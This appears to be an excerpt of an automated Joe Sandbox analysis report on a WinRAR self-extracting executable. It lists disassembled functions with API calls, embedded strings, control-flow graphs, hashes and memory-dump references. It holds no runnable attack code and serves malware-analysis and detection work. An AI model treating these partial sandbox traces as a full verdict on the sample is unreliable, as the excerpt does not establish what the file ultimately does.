                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 86dfcf4a4617571df45bba493ca915e02b0b542d4c0979a96a6dc627f33b2db9
                                    • Instruction ID: f8edfa71ef13886b68c755e7cefd2b50a7356c654dd453b849c2a8a11a83ecd9
                                    • Opcode Fuzzy Hash: 86dfcf4a4617571df45bba493ca915e02b0b542d4c0979a96a6dc627f33b2db9
                                    • Instruction Fuzzy Hash: 3BE0B631004948EBCF23BF64DD09A493F69EB42745F518454FA4A9B236CB35DE92DA50
                                    Function 0034857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog_memcmp
                                    • String ID:
                                    • API String ID: 3004599000-0
                                    • Opcode ID: ffafab8f1135a6e7e3772fa8ea903ee898793992ffbd4e578a341294e82d97c3
                                    • Instruction ID: 1f890c6c5f8c11181b45ea6aea8d9614f8f97168eaee4ecb3d24a173c99a6415
                                    • Opcode Fuzzy Hash: ffafab8f1135a6e7e3772fa8ea903ee898793992ffbd4e578a341294e82d97c3
                                    • Instruction Fuzzy Hash: 1682EA70904245AEDF27DF64C895BFEB7E9AF05300F0945BAE9599F142DB307A88CB60
                                    Function 0035AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035AEE5
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prologItemTextWindow
                                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                    • API String ID: 810644672-3344487560
                                    • Opcode ID: 82dc0dbdc5a04af03954f3ac413aaa84b3b7041945cffa4c2f1ddf4db2dafe56
                                    • Instruction ID: f7c9c1c48f9a3d43c4518f811bcea157029d64c43df05448f89b9f049006b911
                                    • Opcode Fuzzy Hash: 82dc0dbdc5a04af03954f3ac413aaa84b3b7041945cffa4c2f1ddf4db2dafe56
                                    • Instruction Fuzzy Hash: 2342E971944344BEEB239B749C4AFBFB7BCAB06702F400195FA45AB1E1CB745948CB61
                                    Function 003500CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 257 3500cf-3500ee call 35e360 GetModuleHandleW 260 350154-3503b2 257->260 261 3500f0-350107 GetProcAddress 257->261 262 350484-3504b3 GetModuleFileNameW call 34bc85 call 34fe56 260->262 263 3503b8-3503c3 call 3670dd 260->263 264 350121-350131 GetProcAddress 261->264 265 350109-35011f 261->265 279 3504b5-3504bf call 34acf5 262->279 263->262 274 3503c9-3503fa GetModuleFileNameW CreateFileW 263->274 264->260 268 350133-350152 264->268 265->264 268->260 276 3503fc-35040a SetFilePointer 274->276 277 350478-35047f CloseHandle 274->277 276->277 280 35040c-350429 ReadFile 276->280 277->262 286 3504c1-3504c5 call 350085 279->286 287 3504cc 279->287 280->277 282 35042b-350450 280->282 284 35046d-350476 call 34fbd8 282->284 284->277 293 350452-35046c call 350085 284->293 294 3504ca 286->294 290 3504ce-3504d0 287->290 291 3504f2-350518 call 34bcfb GetFileAttributesW 290->291 292 3504d2-3504f0 CompareStringW 290->292 295 35051a-35051e 291->295 301 350522 291->301 292->291 292->295 293->284 294->290 295->279 299 350520 295->299 302 350526-350528 299->302 301->302 303 350560-350562 302->303 304 35052a 302->304 305 35066f-350679 303->305 306 350568-35057f call 34bccf call 34acf5 303->306 307 35052c-350552 call 34bcfb GetFileAttributesW 304->307 317 3505e7-35061a call 34400a AllocConsole 306->317 318 350581-3505e2 call 350085 * 2 call 34ddd1 call 34400a call 34ddd1 call 359f35 306->318 313 350554-350558 307->313 314 35055c 307->314 313->307 316 35055a 313->316 314->303 316->303 323 350667-350669 ExitProcess 317->323 324 35061c-350661 GetCurrentProcessId AttachConsole call 3635b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                    APIs
                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 003500E4
                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003500F6
                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00350127
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003503D4
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003503F0
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00350402
                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00373BA4,00000000), ref: 00350421
                                    • CloseHandle.KERNEL32(00000000), ref: 00350479
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0035048F
                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003504E7
                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00350510
                                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0035054A
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • _swprintf.LIBCMT ref: 003505BE
                                    • _swprintf.LIBCMT ref: 0035060A
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • AllocConsole.KERNEL32 ref: 00350612
                                    • GetCurrentProcessId.KERNEL32 ref: 0035061C
                                    • AttachConsole.KERNEL32(00000000), ref: 00350623
                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00350649
                                    • WriteConsoleW.KERNEL32(00000000), ref: 00350650
                                    • Sleep.KERNEL32(00002710), ref: 0035065B
                                    • FreeConsole.KERNEL32 ref: 00350661
                                    • ExitProcess.KERNEL32 ref: 00350669
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                    • String ID: <7$ ?7$(>7$(@7$0A7$4=7$8<7$<?7$@>7$@@7$D=7$DA7$DXGIDebug.dll$P<7$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;7$T?7$X>7$X@7$\A7$`=7$dwmapi.dll$kernel32$l<7$p>7$p?7$p@7$uxtheme.dll$x=7$|<7$>7$?7
                                    • API String ID: 1201351596-93022140
                                    • Opcode ID: cfedce31f368322ea6ea146d7f6a439f7c5e0679bc745edbdb06e63a66b27342
                                    • Instruction ID: 3fdb16587255a84d291ad31a6d1a51549c4110474eadc22cc47fbd44255150ac
                                    • Opcode Fuzzy Hash: cfedce31f368322ea6ea146d7f6a439f7c5e0679bc745edbdb06e63a66b27342
                                    • Instruction Fuzzy Hash: 2ED18FB5008384ABD3339F50D849F9FBAECAF85705F10891CF58D9A150D7B996489F63
                                    Function 0035BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 406 35bdf5-35be0d call 35e28c call 35e360 411 35ca90-35ca9d 406->411 412 35be13-35be3d call 35aa36 406->412 412->411 415 35be43-35be48 412->415 416 35be49-35be57 415->416 417 35be58-35be6d call 35a6c7 416->417 420 35be6f 417->420 421 35be71-35be86 call 3517ac 420->421 424 35be93-35be96 421->424 425 35be88-35be8c 421->425 427 35ca5c-35ca87 call 35aa36 424->427 428 35be9c 424->428 425->421 426 35be8e 425->426 426->427 427->416 443 35ca8d-35ca8f 427->443 429 35c115-35c117 428->429 430 35c074-35c076 428->430 431 35bea3-35bea6 428->431 432 35c132-35c134 428->432 429->427 434 35c11d-35c12d SetWindowTextW 429->434 430->427 436 35c07c-35c088 430->436 431->427 437 35beac-35bf06 call 359da4 call 34b965 call 34a49d call 34a5d7 call 3470bf 431->437 432->427 435 35c13a-35c141 432->435 434->427 435->427 439 35c147-35c160 435->439 440 35c09c-35c0a1 436->440 441 35c08a-35c09b call 367168 436->441 492 35c045-35c05a call 34a52a 437->492 444 35c162 439->444 445 35c168-35c176 call 3635b3 439->445 448 35c0a3-35c0a9 440->448 449 35c0ab-35c0b6 call 35ab9a 440->449 441->440 443->411 444->445 445->427 461 35c17c-35c185 445->461 453 35c0bb-35c0bd 448->453 449->453 458 35c0bf-35c0c6 call 3635b3 453->458 459 35c0c8-35c0e8 call 3635b3 call 3635de 453->459 458->459 480 35c101-35c103 459->480 481 35c0ea-35c0f1 459->481 466 35c187-35c18b 461->466 467 35c1ae-35c1b1 461->467 466->467 470 35c18d-35c195 466->470 472 35c1b7-35c1ba 467->472 473 35c296-35c2a4 call 34fe56 467->473 470->427 478 35c19b-35c1a9 call 34fe56 470->478 474 35c1c7-35c1e2 472->474 475 35c1bc-35c1c1 472->475 489 35c2a6-35c2ba call 3617cb 473->489 493 35c1e4-35c21e 474->493 494 35c22c-35c233 474->494 475->473 475->474 478->489 480->427 488 35c109-35c110 call 3635ce 480->488 486 35c0f3-35c0f5 481->486 487 35c0f8-35c100 call 367168 481->487 486->487 487->480 488->427 508 35c2c7-35c318 call 34fe56 call 35a8d0 GetDlgItem SetWindowTextW SendMessageW call 3635e9 489->508 509 35c2bc-35c2c0 489->509 510 35c060-35c06f call 34a4b3 492->510 511 35bf0b-35bf1f SetFileAttributesW 492->511 529 35c220 493->529 530 35c222-35c224 493->530 499 35c235-35c24d call 3635b3 494->499 500 35c261-35c284 call 3635b3 * 2 494->500 499->500 522 35c24f-35c25c call 34fe2e 499->522 500->489 534 35c286-35c294 call 34fe2e 500->534 540 35c31d-35c321 508->540 509->508 512 35c2c2-35c2c4 509->512 510->427 517 35bfc5-35bfd5 GetFileAttributesW 511->517 518 35bf25-35bf58 call 34b4f7 call 34b207 call 3635b3 511->518 512->508 517->492 527 35bfd7-35bfe6 DeleteFileW 517->527 549 35bf6b-35bf79 call 34b925 518->549 550 35bf5a-35bf69 call 3635b3 518->550 522->500 527->492 533 35bfe8-35bfeb 527->533 529->530 530->494 537 35bfef-35c01b call 34400a GetFileAttributesW 533->537 534->489 547 35bfed-35bfee 537->547 548 35c01d-35c033 MoveFileW 537->548 540->427 544 35c327-35c33b SendMessageW 540->544 544->427 547->537 548->492 551 35c035-35c03f MoveFileExW 548->551 549->510 556 35bf7f-35bfbe call 3635b3 call 35f350 549->556 550->549 550->556 551->492 556->517
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035BDFA
                                      • Part of subcall function 0035AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0035AAFE
                                    • SetWindowTextW.USER32(?,?), ref: 0035C127
                                    • _wcsrchr.LIBVCRUNTIME ref: 0035C2B1
                                    • GetDlgItem.USER32(?,00000066), ref: 0035C2EC
                                    • SetWindowTextW.USER32(00000000,?), ref: 0035C2FC
                                    • SendMessageW.USER32(00000000,00000143,00000000,0038A472), ref: 0035C30A
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0035C335
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3564274579-312220925
                                    • Opcode ID: ac5b79430668914d061198e4419e6a503c1cc796bd0d5b5d9e21fb543eb6ddcd
                                    • Instruction ID: 6c7daa9fffdfc21abb45890c7b8678cb80b464b61bda83765cbe654ed7529b02
                                    • Opcode Fuzzy Hash: ac5b79430668914d061198e4419e6a503c1cc796bd0d5b5d9e21fb543eb6ddcd
                                    • Instruction Fuzzy Hash: CBE17372D04618AEDF27DBA0DC45DEF77BCAF05316F0144A6FA09E7061EB709A888B50
                                    Function 0034D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 561 34d341-34d378 call 35e28c call 35e360 call 3615e8 568 34d37a-34d3a9 GetModuleFileNameW call 34bc85 call 34fe2e 561->568 569 34d3ab-34d3b4 call 34fe56 561->569 573 34d3b9-34d3dd call 349619 call 3499b0 568->573 569->573 580 34d7a0-34d7a6 call 349653 573->580 581 34d3e3-34d3eb 573->581 587 34d7ab-34d7bb 580->587 583 34d3ed-34d405 call 353781 * 2 581->583 584 34d409-34d438 call 365a90 * 2 581->584 594 34d407 583->594 595 34d43b-34d43e 584->595 594->584 596 34d444-34d44a call 349e40 595->596 597 34d56c-34d58f call 349d30 call 3635d3 595->597 601 34d44f-34d476 call 349bf0 596->601 597->580 608 34d595-34d5b0 call 349bf0 597->608 606 34d535-34d538 601->606 607 34d47c-34d484 601->607 612 34d53b-34d55d call 349d30 606->612 610 34d486-34d48e 607->610 611 34d4af-34d4ba 607->611 618 34d5b2-34d5b7 608->618 619 34d5b9-34d5cc call 3635d3 608->619 610->611 614 34d490-34d4aa call 365ec0 610->614 615 34d4e5-34d4ed 611->615 616 34d4bc-34d4c8 611->616 612->595 630 34d563-34d566 612->630 633 34d4ac 614->633 634 34d52b-34d533 614->634 623 34d4ef-34d4f7 615->623 624 34d519-34d51d 615->624 616->615 621 34d4ca-34d4cf 616->621 626 34d5f1-34d5f8 618->626 619->580 640 34d5d2-34d5ee call 35137a call 3635ce 619->640 621->615 629 34d4d1-34d4e3 call 365808 621->629 623->624 631 34d4f9-34d513 call 365ec0 623->631 624->606 625 34d51f-34d522 624->625 625->607 636 34d5fc-34d625 call 34fdfb call 3635d3 626->636 637 34d5fa 626->637 629->615 644 34d527 629->644 630->580 630->597 631->580 631->624 633->611 634->612 650 34d627-34d62e call 3635ce 636->650 651 34d633-34d649 636->651 637->636 640->626 644->634 650->580 654 34d731-34d757 call 34ce72 call 3635ce * 2 651->654 655 34d64f-34d65d 651->655 689 34d771-34d79d call 365a90 * 2 654->689 690 34d759-34d76f call 353781 * 2 654->690 657 34d664-34d669 655->657 659 34d97c-34d984 657->659 660 34d66f-34d678 657->660 664 34d98a-34d98e 659->664 665 34d72b-34d72e 659->665 662 34d684-34d68b 660->662 663 34d67a-34d67e 660->663 667 34d880-34d891 call 34fcbf 662->667 668 34d691-34d6b6 662->668 663->659 663->662 669 34d990-34d996 664->669 670 34d9de-34d9e4 664->670 665->654 691 34d976-34d979 667->691 692 34d897-34d8c0 call 34fe56 call 365885 667->692 676 34d6b9-34d6de call 3635b3 call 365808 668->676 677 34d722-34d725 669->677 678 34d99c-34d9a3 669->678 674 34d9e6-34d9ec 670->674 675 34da0a-34da2a call 34ce72 670->675 674->675 681 34d9ee-34d9f4 674->681 696 34da02-34da05 675->696 709 34d6f6 676->709 710 34d6e0-34d6ea 676->710 677->657 677->665 684 34d9a5-34d9a8 678->684 685 34d9ca 678->685 681->677 694 34d9fa-34da01 681->694 687 34d9c6-34d9c8 684->687 688 34d9aa-34d9ad 684->688 693 34d9cc-34d9d9 685->693 687->693 697 34d9c2-34d9c4 688->697 698 34d9af-34d9b2 688->698 689->580 690->689 691->659 692->691 721 34d8c6-34d93c call 351596 call 34fdfb call 34fdd4 call 34fdfb call 3658d9 692->721 693->677 694->696 697->693 704 34d9b4-34d9b8 698->704 705 34d9be-34d9c0 698->705 704->681 711 34d9ba-34d9bc 704->711 705->693 716 34d6f9-34d6fd 709->716 710->709 715 34d6ec-34d6f4 710->715 711->693 715->716 716->676 720 34d6ff-34d706 716->720 722 34d70c-34d71a call 34fdfb 720->722 723 34d7be-34d7c1 720->723 754 34d93e-34d947 721->754 755 34d94a-34d95f 721->755 730 34d71f 722->730 723->667 725 34d7c7-34d7ce 723->725 728 34d7d6-34d7d7 725->728 729 34d7d0-34d7d4 725->729 728->725 729->728 732 34d7d9-34d7e7 729->732 730->677 734 34d808-34d830 call 351596 732->734 735 34d7e9-34d7ec 732->735 744 34d832-34d84e call 3635e9 734->744 745 34d853-34d85b 734->745 738 34d805 735->738 739 34d7ee-34d803 735->739 738->734 739->735 739->738 744->730 748 34d862-34d87b call 34dd6b 745->748 749 34d85d 745->749 748->730 749->748 754->755 756 34d960-34d967 755->756 757 34d973-34d974 756->757 758 34d969-34d96d 756->758 757->756 758->730 758->757
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0034D346
                                    • _wcschr.LIBVCRUNTIME ref: 0034D367
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0034D328,?), ref: 0034D382
                                    • __fprintf_l.LIBCMT ref: 0034D873
                                      • Part of subcall function 0035137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034B652,00000000,?,?,?,00010420), ref: 00351396
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                    • String ID: $ ,$$%s:$$97$*messages***$*messages***$@%s:$R$RTL$a
                                    • API String ID: 4184910265-625319642
                                    • Opcode ID: 1e033ba9104ef5cc1aa7895530e0f646caf224a1925246f66ded8650cf27f654
                                    • Instruction ID: 3ca893df0ce71f69885abce4885a7a278087ae678e87b92f8e4841cc35836eed
                                    • Opcode Fuzzy Hash: 1e033ba9104ef5cc1aa7895530e0f646caf224a1925246f66ded8650cf27f654
                                    • Instruction Fuzzy Hash: 3B12B371E002199ADF26DFA4DC81BEEB7F9EF05700F10456AE505AF291EB70AA44CB24
                                    Function 0035CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0035AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                      • Part of subcall function 0035AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                      • Part of subcall function 0035AC74: IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                      • Part of subcall function 0035AC74: TranslateMessage.USER32(?), ref: 0035ACB8
                                      • Part of subcall function 0035AC74: DispatchMessageW.USER32(?), ref: 0035ACC2
                                    • GetDlgItem.USER32(00000068,0039ECB0), ref: 0035CB6E
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0035A632,00000001,?,?,0035AECB,00374F88,0039ECB0), ref: 0035CB96
                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0035CBA1
                                    • SendMessageW.USER32(00000000,000000C2,00000000,003735B4), ref: 0035CBAF
                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035CBC5
                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0035CBDF
                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035CC23
                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0035CC31
                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035CC40
                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035CC67
                                    • SendMessageW.USER32(00000000,000000C2,00000000,0037431C), ref: 0035CC76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                    • String ID: \
                                    • API String ID: 3569833718-2967466578
                                    • Opcode ID: 1a10caad13e471371cc6f070bc667b6292832fac90cc180d0287b2c77a77d640
                                    • Instruction ID: 0e83ed117b796174e47a21c0e66493822c3d830e72fe3716553747d56397447c
                                    • Opcode Fuzzy Hash: 1a10caad13e471371cc6f070bc667b6292832fac90cc180d0287b2c77a77d640
                                    • Instruction Fuzzy Hash: 9A31E271185742AFE313DF24DC4AFAB7FACEB82705F010508FA51961A1DB645908CBB6
                                    Function 0035CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 795 35ce22-35ce3a call 35e360 798 35ce40-35ce4c call 3635b3 795->798 799 35d08b-35d093 795->799 798->799 802 35ce52-35ce7a call 35f350 798->802 805 35ce84-35ce91 802->805 806 35ce7c 802->806 807 35ce95-35ce9e 805->807 808 35ce93 805->808 806->805 809 35ced6 807->809 810 35cea0-35cea2 807->810 808->807 812 35ceda-35cedd 809->812 811 35ceaa-35cead 810->811 813 35ceb3-35cebb 811->813 814 35d03c-35d041 811->814 815 35cee4-35cee6 812->815 816 35cedf-35cee2 812->816 817 35d055-35d05d 813->817 818 35cec1-35cec7 813->818 819 35d036-35d03a 814->819 820 35d043 814->820 821 35cef9-35cf0e call 34b493 815->821 822 35cee8-35ceef 815->822 816->815 816->821 826 35d065-35d06d 817->826 827 35d05f-35d061 817->827 818->817 824 35cecd-35ced4 818->824 819->814 825 35d048-35d04c 819->825 820->825 830 35cf27-35cf32 call 34a180 821->830 831 35cf10-35cf1d call 3517ac 821->831 822->821 828 35cef1 822->828 824->809 824->811 825->817 826->812 827->826 828->821 837 35cf34-35cf4b call 34b239 830->837 838 35cf4f-35cf5c ShellExecuteExW 830->838 831->830 836 35cf1f 831->836 836->830 837->838 840 35cf62-35cf6f 838->840 841 35d08a 838->841 843 35cf71-35cf78 840->843 844 35cf82-35cf84 840->844 841->799 843->844 845 35cf7a-35cf80 843->845 846 35cf86-35cf8f 844->846 847 35cf9b-35cfba call 35d2e6 844->847 845->844 848 35cff1-35cffd CloseHandle 845->848 846->847 856 35cf91-35cf99 ShowWindow 846->856 847->848 865 35cfbc-35cfc4 847->865 849 35cfff-35d00c call 3517ac 848->849 850 35d00e-35d01c 848->850 849->850 862 35d072 849->862 854 35d01e-35d020 850->854 855 35d079-35d07b 850->855 854->855 860 35d022-35d028 854->860 855->841 859 35d07d-35d07f 855->859 856->847 859->841 863 35d081-35d084 ShowWindow 859->863 860->855 864 35d02a-35d034 860->864 862->855 863->841 864->855 865->848 866 35cfc6-35cfd7 GetExitCodeProcess 865->866 866->848 867 35cfd9-35cfe3 866->867 868 35cfe5 867->868 869 35cfea 867->869 868->869 869->848
                                    APIs
                                    • ShellExecuteExW.SHELL32(?), ref: 0035CF54
                                    • ShowWindow.USER32(?,00000000), ref: 0035CF93
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0035CFCF
                                    • CloseHandle.KERNEL32(?), ref: 0035CFF5
                                    • ShowWindow.USER32(?,00000001), ref: 0035D084
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
